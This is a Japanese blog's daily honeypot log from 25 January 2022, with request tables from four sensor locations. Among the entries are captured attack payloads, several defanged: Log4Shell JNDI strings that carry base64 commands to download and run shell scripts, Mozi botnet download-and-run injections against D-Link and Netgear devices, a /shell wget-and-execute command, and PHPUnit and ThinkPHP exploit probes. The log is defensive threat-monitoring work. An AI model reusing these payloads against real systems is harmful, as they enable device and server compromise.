2022/01/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/01/25分です。

特徴

共通

D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:US

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nessusによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：184 (前日比：61)
US：総アクセス数：49 (前日比：-31)
UK：総アクセス数：48 (前日比：8)
SG：総アクセス数：144 (前日比：-28)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.133.12.155	United States
1	3.238.16.141	United States
1	4.28.87.68	United States
63	13.82.110.208	United States
2	20.62.100.83	United States
1	42.238.172.235	China
1	44.202.23.255	United States
1	45.9.20.57	Russia
2	45.137.21.134	Bangladesh
9	45.146.165.37	Russia
40	54.152.74.220	United States
2	62.197.136.127	Netherlands
1	103.138.108.64	Vietnam
1	103.155.82.241	Vietnam
14	107.172.73.224	United States
2	107.189.28.51	United States
1	109.237.103.123	Russia
1	111.237.111.81	Japan
1	114.246.35.129	China
1	128.199.2.117	United Kingdom
1	132.145.39.16	United States
16	135.125.217.54	France
1	137.184.198.10	United States
1	157.245.39.22	United States
1	157.245.43.33	United States
1	159.223.178.212	United States
1	174.138.40.190	United States
1	178.62.30.6	United States
1	178.62.59.41	United States
2	185.254.196.217	Ukraine
4	185.254.196.218	Ukraine
1	192.241.211.96	United States
1	192.241.213.40	United States
2	198.46.171.11	United States
1	206.189.226.24	United States
1	206.189.226.33	United States
1	209.17.96.162	United States
1	209.141.33.65	United States

UserAgent一覧

件数	UserAgent
5	`-`
1	`Go-http-client/1.1`
1	`IDBTE4M CODE87`
2	`Mozila/5.0`
63	`Mozilla/5.0 (Linux x86_64; X11) AppleWebKit/536.30 (KHTML, like Gecko) Version/6.1.9 Safari/536.19`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36`
41	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2`
2	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01\xfa\x01`
1		`\x16\x03\x01`
44	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.local`	HTTP/1.1
1	GET	`/.production`	HTTP/1.1
1	GET	`/.remote`	HTTP/1.1
1	GET	`//admin/.env`	HTTP/1.1
1	GET	`//administrator/.env`	HTTP/1.1
1	GET	`//api/.env`	HTTP/1.1
1	GET	`//app/.env`	HTTP/1.1
1	GET	`//apps/.env`	HTTP/1.1
1	GET	`//assets/.env`	HTTP/1.1
1	GET	`//config/.env`	HTTP/1.1
1	GET	`//core/.env`	HTTP/1.1
1	GET	`//core/Datavase/.env`	HTTP/1.1
1	GET	`//core/app/.env`	HTTP/1.1
1	GET	`//cron/.env`	HTTP/1.1
1	GET	`//cronlab/.env`	HTTP/1.1
1	GET	`//database/.env`	HTTP/1.1
1	GET	`//en/.env`	HTTP/1.1
1	GET	`//exapi/.env`	HTTP/1.1
1	GET	`//lab/.env`	HTTP/1.1
1	GET	`//laravel/.env`	HTTP/1.1
1	GET	`//lib/.env`	HTTP/1.1
1	GET	`//psnlink/.env`	HTTP/1.1
1	GET	`//public/.env`	HTTP/1.1
1	GET	`//saas/.env`	HTTP/1.1
1	GET	`//site/.env`	HTTP/1.1
1	GET	`//sitemaps/.env`	HTTP/1.1
1	GET	`//tools/.env`	HTTP/1.1
1	GET	`//uploads/.env`	HTTP/1.1
1	GET	`//v1/.env`	HTTP/1.1
1	GET	`//v2/.env`	HTTP/1.1
1	GET	`//vendor/.env`	HTTP/1.1
1	GET	`//web/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/cli/.env`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/dependencies/.env`	HTTP/1.1
1	GET	`/deployment/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
2	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/document/.env`	HTTP/1.1
1	GET	`/engine/.env`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/framework/.env`	HTTP/1.1
1	GET	`/frontend/.env`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/laravel-artisa/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/master/.env`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/personal/.env`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/search/.env`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/vod_installer/.env`	HTTP/1.1
1	GET	`/vue/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	POST	`//admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`//www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.104.110.22	United States
1	20.114.244.110	United States
1	37.49.225.132	Belize
2	45.137.21.134	Bangladesh
6	45.146.165.37	Russia
6	51.79.29.48	Canada
3	89.248.165.52	United Kingdom
2	107.189.28.51	United States
3	107.189.29.181	United States
1	109.237.103.123	Russia
1	128.199.160.152	United Kingdom
1	137.184.198.10	United States
5	137.184.221.114	United States
1	157.245.39.24	United States
1	157.245.43.33	United States
1	157.245.43.242	United States
2	159.203.160.245	United States
1	185.40.4.128	Seychelles
1	185.220.101.41	Germany
1	192.241.213.152	United States
1	192.241.214.29	United States
1	194.182.168.118	Switzerland
1	198.46.154.137	United States
1	199.127.61.114	United States
1	206.189.226.24	United States
1	206.189.226.29	United States
1	209.17.97.90	United States
1	223.149.254.57	China

UserAgent一覧

件数	UserAgent
6	`-`
6	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2`
2	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`
1	`libwww-perl/6.61`

リクエスト内容一覧

件数	Method	Request	Protocol
3		`-`
1		`\x16\x03\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
22	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
2	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/level/15/exec/-/sh/run/CR`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
6	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	34.75.236.135	United States
4	45.137.21.134	Bangladesh
9	45.146.165.37	Russia
8	47.90.183.194	United States
1	66.240.192.82	United States
1	79.124.62.106	Bulgaria
3	89.248.165.52	United Kingdom
2	94.232.43.63	Russia
1	107.189.12.178	United States
2	107.189.28.51	United States
2	107.189.29.181	United States
1	109.237.103.123	Russia
1	117.213.46.242	India
1	125.46.91.250	China
1	137.184.198.10	United States
3	140.246.143.76	China
1	142.93.215.37	United States
2	157.245.70.127	United States
1	192.241.205.177	United States
1	192.241.209.126	United States
1	209.17.97.98	United States

UserAgent一覧

件数	UserAgent
14	`-`
1	`Hello, world`
5	`Mozila/5.0`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (compatible;)`
4	`Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2`
2	`Mozilla/5.0 zgrab/0.x`
2	`curl/7.75.0`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
3		`\x03`
1		`\x16\x03\x01\x01\xfc\x01`
2		`\x16\x03\x01\x02`
2		`\x16\x03\x01`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
4	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
2	GET	`/pmd/index.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=%7D%27)&wt=json`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/text4041643039361`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
5	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
82	20.74.250.212	United States
1	20.117.83.152	United States
1	34.75.236.135	United States
2	40.71.60.51	United States
2	45.9.20.57	Russia
2	45.137.21.134	Bangladesh
7	45.146.165.37	Russia
6	51.79.29.48	Canada
1	61.3.154.222	India
1	68.183.150.101	United States
1	78.128.112.14	Bulgaria
4	80.82.77.139	United Kingdom
3	89.248.165.52	United Kingdom
1	106.15.234.110	China
1	107.189.28.51	United States
2	107.189.29.181	United States
1	109.237.103.123	Russia
1	112.25.204.54	China
1	113.227.151.241	China
1	120.86.238.118	China
1	137.184.184.243	United States
1	143.198.183.232	United States
1	147.182.182.234	United States
2	157.230.216.203	United States
1	157.245.35.242	United States
1	157.245.39.22	United States
1	157.245.43.132	United States
2	157.245.47.22	United States
2	159.203.160.245	United States
1	178.62.30.6	United States
4	185.142.236.43	Seychelles
2	185.254.196.223	Ukraine
1	192.241.204.249	United States
1	192.241.213.239	United States
1	206.189.226.29	United States
1	206.189.226.57	United States

UserAgent一覧

件数	UserAgent
18	`-`
1	`Hello, World`
1	`Hello, world`
3	`Mozila/5.0`
74	`Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2`
2	`Mozilla/5.0 zgrab/0.x`
6	`Nessus`
1	`curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}')`
1	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
3		`\x03`
2		`\x16\x03\x01\x02`
1	CONNECT	`85[.]206[.]160[.]115:80`	HTTP/1.1
1	GET	`/.cobalt`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
2	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//`	HTTP/1.1
1	GET	`/:undefined`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/ControlManager/default.htm`	HTTP/1.1
1	GET	`/HNAP1/`	HTTP/1.1
1	GET	`/Home.do`	HTTP/1.1
1	GET	`/MSWSMTP/Common/Authentication/Logon.aspx`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin.back`	HTTP/1.1
1	GET	`/admin/login.do`	HTTP/1.1
1	GET	`/admin/login.jsp`	HTTP/1.1
1	GET	`/authenticate/login`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.asp`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.cfm`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.cgi`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.html`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.inc`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.php3`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.php`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.pl`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.sh`	HTTP/1.1
1	GET	`/cgi-bin/qeSj0rzuLdQ3.shtml`	HTTP/1.1
1	GET	`/commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/ddem/`	HTTP/1.1
2	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/dms2/Login.jsp`	HTTP/1.1
1	GET	`/en/main.js`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/file`	HTTP/1.1
2	GET	`/header.php?tab=status`	HTTP/1.1
1	GET	`/home.htm`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/intruvert/jsp/admin/Login.jsp`	HTTP/1.1
1	GET	`/js/Device.js`	HTTP/1.1
1	GET	`/links_en.html`	HTTP/1.1
1	GET	`/login.htm`	HTTP/1.1
1	GET	`/login.html`	HTTP/1.1
1	GET	`/login.php`	HTTP/1.1
3	GET	`/login?redirects=10`	HTTP/1.1
